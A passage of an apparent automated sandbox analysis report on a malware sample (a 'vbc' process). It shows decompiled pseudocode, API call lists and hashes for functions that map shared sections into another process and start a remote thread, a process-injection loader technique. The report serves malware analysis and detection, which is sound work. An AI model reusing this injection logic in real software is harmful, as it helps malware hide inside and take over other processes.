0x00401934
0x00401936
0x00401939
0x00401949
0x00401888
0x00401888
0x0040188d
0x0040188e
0x004018a4
0x004018b3
0x004018c0
0x004018d7
0x004018e5
0x004018e5
0x00401886
0x00401796
0x00401774
0x00401743
0x0040167a
0x00401966
0x0040196b
0x00401993

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040176F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401791

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: b73008d36a232ba2659a1168dc5dbebbb68a6854f22cdd9ba2d70834c550a8b1
Instruction ID: 5cd23dc7fdecf773fd93c991c494fcf980b85e2b00be7ae144832a4057ef90ff
Opcode Fuzzy Hash: b73008d36a232ba2659a1168dc5dbebbb68a6854f22cdd9ba2d70834c550a8b1
Instruction Fuzzy Hash: EF5127B0900249BBEB208F95CC48FEFBBB9EF85B10F140169F911BA2A5D6759940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401600 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401600(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				void* _t108;
				intOrPtr* _t110;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t132;
				void* _t134;
				void** _t136;
				signed int _t143;
				int _t144;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				long _t178;
				intOrPtr _t180;
				void* _t181;
				HANDLE* _t189;
				HANDLE* _t191;
				void* _t196;
				intOrPtr* _t199;
				void* _t202;
				void* _t203;
				void* _t204;
				intOrPtr* _t206;
				void* _t209;
				long _t224;

				_t204 = _t203 - 1;
				asm("adc al, 0xeb");
				_t134 = 0x373;
				L004012ED(0x161c, __ebx, _t134, __edi, __esi, __eflags);
				_t132 =  *((intOrPtr*)(_t204 + 8));
				_t178 = 0;
				 *((intOrPtr*)(_t204 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t204 - 0x34)) =  *((intOrPtr*)(_t204 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t132 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t132 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t204 - 0x5c)) = _t89;
				_t189 = _t204 - 0x60;
				 *_t189 = _t178;
				 *((intOrPtr*)(_t132 + 0x4c))(_t89, _t189);
				_t92 =  *_t189;
				if(_t92 != 0) {
					_t136 = _t204 - 0x30;
					 *_t136 = _t92;
					_t136[1] = _t178;
					_t189 = _t204 - 0x28;
					 *((intOrPtr*)(_t132 + 0x10))(_t189, 0x18);
					 *_t189 = 0x18;
					_push(_t204 - 0x30);
					_push(_t189);
					_push(0x40);
					_push(_t204 - 0x10);
					if( *((intOrPtr*)(_t132 + 0x70))() == 0 && NtDuplicateObject( *(_t204 - 0x10), 0xffffffff, 0xffffffff, _t204 - 0xc, _t178, _t178, 2) == 0) {
						 *(_t204 - 8) = _t178;
						_t100 = _t204 - 0x50;
						 *(_t100 + 4) = _t178;
						 *_t100 = 0x5000;
						_t191 = _t204 - 0x54;
						if(NtCreateSection(_t191, 6, _t178, _t100, 4, 0x8000000, _t178) == 0) {
							 *_t25 =  *(_t204 - 0x50);
							_t125 = _t204 - 0x44;
							 *_t125 = _t178;
							if(NtMapViewOfSection( *_t191, 0xffffffff, _t125, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
								_t127 = _t204 - 0x3c;
								 *_t127 = _t178;
								if(NtMapViewOfSection( *_t191,  *(_t204 - 0xc), _t127, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
									_t202 =  *(_t204 - 0x44);
									 *((intOrPtr*)(_t132 + 0x20))(_t178, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t204 + 0x14));
									 *(_t204 - 8) =  *(_t204 - 8) + 1;
								}
							}
						}
						_t102 = _t204 - 0x50;
						 *(_t102 + 4) = _t178;
						 *_t102 =  *((intOrPtr*)(_t204 + 0x10)) + 0x10000;
						_t189 = _t204 - 0x58;
						if(NtCreateSection(_t189, 0xe, _t178, _t102, 0x40, 0x8000000, _t178) == 0 &&  *(_t204 - 8) != 0) {
							 *_t46 =  *(_t204 - 0x50);
							_t104 = _t204 - 0x48;
							 *_t104 = _t178;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t104, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
								_t106 = _t204 - 0x40;
								 *_t106 = _t178;
								_t224 = NtMapViewOfSection( *_t189,  *(_t204 - 0xc), _t106, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 0x20);
								if(_t224 == 0) {
									L21();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t209 = _t206 + 4;
									_t161 = 0x2260;
									_t108 = _t161;
									_t162 = _t161 << 5;
									_t163 = _t162 + _t108;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc8");
									_t165 = _t164 ^ 0xd2aedb1b;
									_t206 = _t209 - _t165;
									_t196 =  *((intOrPtr*)(_t204 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0xc))));
									_t143 =  *(_t196 + 6) & 0x0000ffff;
									_push(_t196);
									_t166 = _t196;
									if( *((intOrPtr*)(_t204 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t143);
									_t144 =  *(_t167 + 0x10);
									if(_t144 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t204 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t204 + 0xc)), _t144);
										_t206 = _t206 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t229 =  *((intOrPtr*)(_t204 - 0x34));
									if( *((intOrPtr*)(_t204 - 0x34)) == 0) {
										_push(_t189);
										_t170 = _t189[0xd] -  *(_t204 - 0x40);
										_t199 = _t189[0x28] +  *(_t204 - 0x48);
										__eflags = _t199;
										while(1) {
											__eflags =  *_t199;
											if( *_t199 == 0) {
												break;
											}
											_t180 =  *_t199;
											_t199 = _t199 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t170;
												__eflags =  *((intOrPtr*)(0 +  *(_t204 - 0x48) + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t189);
										_t178 = 0;
										__eflags = 0;
										_t110 = _t204 - 4;
										 *_t110 = 0;
										 *((intOrPtr*)(_t132 + 0x98))( *(_t204 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t204 - 0x40),  *(_t204 - 0x3c), _t110, 0);
									} else {
										L54();
										_pop(_t181);
										_t178 = _t181 - 0x188d;
										 *((intOrPtr*)(_t178 + 0x18c1)) = _t178 + 0x2d60;
										L0040137F(_t132, _t178 + 0x18c1, _t178, _t189, _t229, _t178 + 0x2d60, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t178 + 0x18e6)) = _t178 + 0x2db0;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161c);
				_t93 =  *_t206;
				return L004012ED(_t93, _t132, 0x373, _t178, _t189, _t229);
			}

0x00401600
0x00401601
0x0040160f
0x00401617
0x0040161c
0x0040161f
0x00401621
0x0040162a
0x0040162c
0x0040162c
0x0040162f
0x0040162f
0x00401634
0x00000000
0x00000000
0x00401956
0x00401956
0x0040163a
0x0040163d
0x00401640
0x00401644
0x00401647
0x0040164b
0x00401651
0x00401654
0x00401656
0x00401659
0x0040165f
0x00401662
0x00401670
0x00401671
0x00401672
0x00401674
0x0040167a
0x0040169d
0x004016a0
0x004016a3
0x004016a6
0x004016ac
0x004016c1
0x004016c6
0x004016c9
0x004016cc
0x004016e4
0x004016e6
0x004016e9
0x00401702
0x00401704
0x0040170e
0x00401714
0x0040171a
0x0040171a
0x00401702
0x004016e4
0x0040171d
0x00401729
0x0040172c
0x0040172e
0x00401743
0x00401756
0x00401759
0x0040175c
0x00401774
0x0040177a
0x0040177d
0x00401794
0x00401796
0x0040179c
0x004017a1
0x004017a1
0x004017a9
0x004017ea
0x004017fa
0x00401805
0x0040180f
0x0040181d
0x00401825
0x0040182a
0x00401833
0x0040183c
0x00401848
0x0040184a
0x0040184e
0x0040184f
0x00401855
0x0040185f
0x0040185f
0x00401857
0x00401857
0x00401857
0x00401865
0x00401866
0x0040186b
0x00401879
0x00401879
0x00401879
0x0040187f
0x00401881
0x00401882
0x00401886
0x004018ee
0x004018f2
0x004018fd
0x004018fd
0x00401900
0x00401900
0x00401903
0x00000000
0x00000000
0x00401905
0x0040190f
0x00401914
0x00401916
0x0040191b
0x00401927
0x00401927
0x00401927
0x00401929
0x00401929
0x0040192d
0x00401934
0x00401934
0x00401936
0x00401939
0x00401949
0x00401888
0x00401888
0x0040188d
0x0040188e
0x004018a4
0x004018b3
0x004018c0
0x004018d7
0x004018e5
0x004018e5
0x00401886
0x00401796
0x00401774
0x00401743
0x0040167a
0x00401966
0x0040196b
0x00401993

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040176F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401791

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c838682c332385e2d885fe22b4c3d52f61e9fc607ba01145cc57c0517593a7e
Instruction ID: f2ed21f0fa72c98f368405c785c410b9b361a013cd4fbe7763913dbd5107623f
Opcode Fuzzy Hash: 6c838682c332385e2d885fe22b4c3d52f61e9fc607ba01145cc57c0517593a7e
Instruction Fuzzy Hash: 9A5128B0900249BFEB208F95CC48FEFBBB9EF85B10F100159FA11BA2A5D7749940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401607 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00401607(void* __ebx, void* __edi, void* __esi) {
				void* _t86;
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				void* _t108;
				intOrPtr* _t110;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t132;
				void* _t135;
				void** _t137;
				signed int _t144;
				int _t145;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				void* _t167;
				intOrPtr* _t168;
				void* _t171;
				long _t179;
				intOrPtr _t181;
				void* _t182;
				HANDLE* _t190;
				HANDLE* _t192;
				void* _t197;
				intOrPtr* _t200;
				void* _t203;
				void* _t204;
				intOrPtr* _t206;
				void* _t209;
				void* _t210;
				long _t224;

				_t210 = _t206 - __edi;
				_t135 = 0x373;
				L004012ED(_t86, __ebx, _t135, __edi, __esi, _t210);
				_t132 =  *((intOrPtr*)(_t204 + 8));
				_t179 = 0;
				 *((intOrPtr*)(_t204 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t204 - 0x34)) =  *((intOrPtr*)(_t204 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t132 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t132 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t204 - 0x5c)) = _t89;
				_t190 = _t204 - 0x60;
				 *_t190 = _t179;
				 *((intOrPtr*)(_t132 + 0x4c))(_t89, _t190);
				_t92 =  *_t190;
				if(_t92 != 0) {
					_t137 = _t204 - 0x30;
					 *_t137 = _t92;
					_t137[1] = _t179;
					_t190 = _t204 - 0x28;
					 *((intOrPtr*)(_t132 + 0x10))(_t190, 0x18);
					 *_t190 = 0x18;
					_push(_t204 - 0x30);
					_push(_t190);
					_push(0x40);
					_push(_t204 - 0x10);
					if( *((intOrPtr*)(_t132 + 0x70))() == 0 && NtDuplicateObject( *(_t204 - 0x10), 0xffffffff, 0xffffffff, _t204 - 0xc, _t179, _t179, 2) == 0) {
						 *(_t204 - 8) = _t179;
						_t100 = _t204 - 0x50;
						 *(_t100 + 4) = _t179;
						 *_t100 = 0x5000;
						_t192 = _t204 - 0x54;
						if(NtCreateSection(_t192, 6, _t179, _t100, 4, 0x8000000, _t179) == 0) {
							 *_t25 =  *(_t204 - 0x50);
							_t125 = _t204 - 0x44;
							 *_t125 = _t179;
							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t179, _t179, _t179, _t204 - 0x38, 1, _t179, 4) == 0) {
								_t127 = _t204 - 0x3c;
								 *_t127 = _t179;
								if(NtMapViewOfSection( *_t192,  *(_t204 - 0xc), _t127, _t179, _t179, _t179, _t204 - 0x38, 1, _t179, 4) == 0) {
									_t203 =  *(_t204 - 0x44);
									 *((intOrPtr*)(_t132 + 0x20))(_t179, _t203, 0x104);
									 *((intOrPtr*)(_t203 + 0x208)) =  *((intOrPtr*)(_t204 + 0x14));
									 *(_t204 - 8) =  *(_t204 - 8) + 1;
								}
							}
						}
						_t102 = _t204 - 0x50;
						 *(_t102 + 4) = _t179;
						 *_t102 =  *((intOrPtr*)(_t204 + 0x10)) + 0x10000;
						_t190 = _t204 - 0x58;
						if(NtCreateSection(_t190, 0xe, _t179, _t102, 0x40, 0x8000000, _t179) == 0 &&  *(_t204 - 8) != 0) {
							 *_t46 =  *(_t204 - 0x50);
							_t104 = _t204 - 0x48;
							 *_t104 = _t179;
							if(NtMapViewOfSection( *_t190, 0xffffffff, _t104, _t179, _t179, _t179, _t204 - 0x38, 1, _t179, 4) == 0) {
								_t106 = _t204 - 0x40;
								 *_t106 = _t179;
								_t224 = NtMapViewOfSection( *_t190,  *(_t204 - 0xc), _t106, _t179, _t179, _t179, _t204 - 0x38, 1, _t179, 0x20);
								if(_t224 == 0) {
									L17();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t209 = _t206 + 4;
									_t162 = 0x2260;
									_t108 = _t162;
									_t163 = _t162 << 5;
									_t164 = _t163 + _t108;
									asm("lodsb");
									_t165 = _t164;
									asm("loop 0xffffffc8");
									_t166 = _t165 ^ 0xd2aedb1b;
									_t206 = _t209 - _t166;
									_t197 =  *((intOrPtr*)(_t204 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0xc))));
									_t144 =  *(_t197 + 6) & 0x0000ffff;
									_push(_t197);
									_t167 = _t197;
									if( *((intOrPtr*)(_t204 - 0x34)) == 0) {
										_t168 = _t167 + 0xf8;
										__eflags = _t168;
									} else {
										_t168 = _t167 + 0x108;
									}
									_push(_t144);
									_t145 =  *(_t168 + 0x10);
									if(_t145 != 0) {
										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t204 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t204 + 0xc)), _t145);
										_t206 = _t206 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t190);
									_t229 =  *((intOrPtr*)(_t204 - 0x34));
									if( *((intOrPtr*)(_t204 - 0x34)) == 0) {
										_push(_t190);
										_t171 = _t190[0xd] -  *(_t204 - 0x40);
										_t200 = _t190[0x28] +  *(_t204 - 0x48);
										__eflags = _t200;
										while(1) {
											__eflags =  *_t200;
											if( *_t200 == 0) {
												break;
											}
											_t181 =  *_t200;
											_t200 = _t200 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t171;
												__eflags =  *((intOrPtr*)(0 +  *(_t204 - 0x48) + _t181));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t190);
										_t179 = 0;
										__eflags = 0;
										_t110 = _t204 - 4;
										 *_t110 = 0;
										 *((intOrPtr*)(_t132 + 0x98))( *(_t204 - 0xc), 0, 0, 0, 0, 0, _t190[0xa] +  *(_t204 - 0x40),  *(_t204 - 0x3c), _t110, 0);
									} else {
										L50();
										_pop(_t182);
										_t179 = _t182 - 0x188d;
										 *((intOrPtr*)(_t179 + 0x18c1)) = _t179 + 0x2d60;
										L0040137F(_t132, _t179 + 0x18c1, _t179, _t190, _t229, _t179 + 0x2d60, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t179 + 0x18e6)) = _t179 + 0x2db0;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161c);
				_t93 =  *_t206;
				return L004012ED(_t93, _t132, 0x373, _t179, _t190, _t229);
			}

0x00401607
0x0040160f
0x00401617
0x0040161c
0x0040161f
0x00401621
0x0040162a
0x0040162c
0x0040162c
0x0040162f
0x0040162f
0x00401634
0x00000000
0x00000000
0x00401956
0x00401956
0x0040163a
0x0040163d
0x00401640
0x00401644
0x00401647
0x0040164b
0x00401651
0x00401654
0x00401656
0x00401659
0x0040165f
0x00401662
0x00401670
0x00401671
0x00401672
0x00401674
0x0040167a
0x0040169d
0x004016a0
0x004016a3
0x004016a6
0x004016ac
0x004016c1
0x004016c6
0x004016c9
0x004016cc
0x004016e4
0x004016e6
0x004016e9
0x00401702
0x00401704
0x0040170e
0x00401714
0x0040171a
0x0040171a
0x00401702
0x004016e4
0x0040171d
0x00401729
0x0040172c
0x0040172e
0x00401743
0x00401756
0x00401759
0x0040175c
0x00401774
0x0040177a
0x0040177d
0x00401794
0x00401796
0x0040179c
0x004017a1
0x004017a1
0x004017a9
0x004017ea
0x004017fa
0x00401805
0x0040180f
0x0040181d
0x00401825
0x0040182a
0x00401833
0x0040183c
0x00401848
0x0040184a
0x0040184e
0x0040184f
0x00401855
0x0040185f
0x0040185f
0x00401857
0x00401857
0x00401857
0x00401865
0x00401866
0x0040186b
0x00401879
0x00401879
0x00401879
0x0040187f
0x00401881
0x00401882
0x00401886
0x004018ee
0x004018f2
0x004018fd
0x004018fd
0x00401900
0x00401900
0x00401903
0x00000000
0x00000000
0x00401905
0x0040190f
0x00401914
0x00401916
0x0040191b
0x00401927
0x00401927
0x00401927
0x00401929
0x00401929
0x0040192d
0x00401934
0x00401934
0x00401936
0x00401939
0x00401949
0x00401888
0x00401888
0x0040188d
0x0040188e
0x004018a4
0x004018b3
0x004018c0
0x004018d7
0x004018e5
0x004018e5
0x00401886
0x00401796
0x00401774
0x00401743
0x0040167a
0x00401966
0x0040196b
0x00401993

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040176F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401791

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 80b731fc2edb4b7b72096c09a5d354738684f91daa03b12009c4e5a7791ba310
Instruction ID: 389d51b188f74b11e37e0c95971e7d00c02ee0a6546981c5445d81efbbdfed72
Opcode Fuzzy Hash: 80b731fc2edb4b7b72096c09a5d354738684f91daa03b12009c4e5a7791ba310
Instruction Fuzzy Hash: 9F51F8B5900249BFEF208F95CC49FEFBBB9EF85B10F100159FA11BA2A5D6749944CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401996 Relevance: 1.3, APIs: 1, Instructions: 53
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00401996(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t16;
				intOrPtr* _t17;
				void* _t18;
				void* _t20;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t25 = __eflags;
				_push(0x19cf);
				_t8 =  *_t22;
				_t23 = _t22 + 4;
				_t18 = 0x61;
				L004012ED(_t8, _t16, _t18, _t20, _t21, __eflags);
				_t17 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_t11 = L00401522( &_v8, _t17, _t25, _t17, _a8); // executed
				_t26 = _t11;
				if(_t11 != 0) {
					E004015EB(_t26, _t17, _t11, _v8, _a16); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t23;
				return L004012ED(_t13, _t17, 0x61, _t20, _t21, _t26);
			}

0x00401996
0x004019a6
0x004019ab
0x004019ae
0x004019c2
0x004019ca
0x004019cf
0x004019d7
0x004019dd
0x004019de
0x004019e5
0x004019ea
0x004019ec
0x004019f6
0x004019f6
0x004019ff
0x00401a08
0x00401a0d
0x00401a34

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2aa3994a2248ca89c3481aa428b1324e317f3b8c2e15ca7f2b31f40a7e2db61f
Instruction ID: 24c392a411cf437f8c2e061dd1409c5534f210dcce273ca075fca37c15b207fc
Opcode Fuzzy Hash: 2aa3994a2248ca89c3481aa428b1324e317f3b8c2e15ca7f2b31f40a7e2db61f
Instruction Fuzzy Hash: E401F7B2308248FBDB006AD49D91DBA33A99B41710F200537B683790F1D57D9912EB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004019A1 Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E004019A1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				void* _t19;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("lock int 0xc6");
				asm("out 0x34, eax");
				_push(0x19cf);
				_t8 =  *_t27;
				_t28 = _t27 + 4;
				_t19 = 0x61;
				L004012ED(_t8, __ebx, _t19, __edi, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_t11 = L00401522(_t25 - 4, _t17, _t31, _t17,  *((intOrPtr*)(_t25 + 0xc))); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					E004015EB(_t32, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t28;
				return L004012ED(_t13, _t17, 0x61, _t21, _t23, _t32);
			}

0x004019a1
0x004019a1
0x004019a1
0x004019a1
0x004019a4
0x004019a6
0x004019ab
0x004019ae
0x004019c2
0x004019ca
0x004019cf
0x004019d7
0x004019dd
0x004019de
0x004019e5
0x004019ea
0x004019ec
0x004019f6
0x004019f6
0x004019ff
0x00401a08
0x00401a0d
0x00401a34

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 48abe0e5e916fcf01cacac71bf3fb9758dc1c70dd5011dce89efb9d5383521dc
Instruction ID: 21294f5f63950678430cba152632e7c12a5c10d2d465431cb89b6dd7cc50de4e
Opcode Fuzzy Hash: 48abe0e5e916fcf01cacac71bf3fb9758dc1c70dd5011dce89efb9d5383521dc
Instruction Fuzzy Hash: FE01D672308284FBDB006AD49C91DB933A59B44710F200577F693B90F1C57D8912AB2F

Uniqueness

Uniqueness Score: -1.00%

Function 004019B4 Relevance: 1.3, APIs: 1, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E004019B4(signed int __ebx, signed int __ecx, void* __edi, void* __esi) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t18;
				void* _t21;
				void* _t27;
				intOrPtr* _t29;
				intOrPtr* _t30;
				signed char _t33;

				_t25 = __esi;
				_t23 = __edi;
				_t17 = __ebx & __ecx;
				_t33 = __ebx & __ecx;
				_push(0x19cf);
				_t8 =  *_t29;
				_t30 = _t29 + 4;
				_t21 = 0x61;
				L004012ED(_t8, _t17, _t21, __edi, __esi, _t33);
				_t18 =  *((intOrPtr*)(_t27 + 8));
				Sleep(0x1388);
				_push(_t27 - 4);
				_push( *((intOrPtr*)(_t27 + 0x10)));
				_t11 = L00401522(_t27 - 4, _t18, _t33, _t18,  *((intOrPtr*)(_t27 + 0xc))); // executed
				_t34 = _t11;
				if(_t11 != 0) {
					E004015EB(_t34, _t18, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
				}
				 *_t18(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t30;
				return L004012ED(_t13, _t18, 0x61, _t23, _t25, _t34);
			}

0x004019b4
0x004019b4
0x004019b4
0x004019b4
0x004019a6
0x004019ab
0x004019ae
0x004019c2
0x004019ca
0x004019cf
0x004019d7
0x004019dd
0x004019de
0x004019e5
0x004019ea
0x004019ec
0x004019f6
0x004019f6
0x004019ff
0x00401a08
0x00401a0d
0x00401a34

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

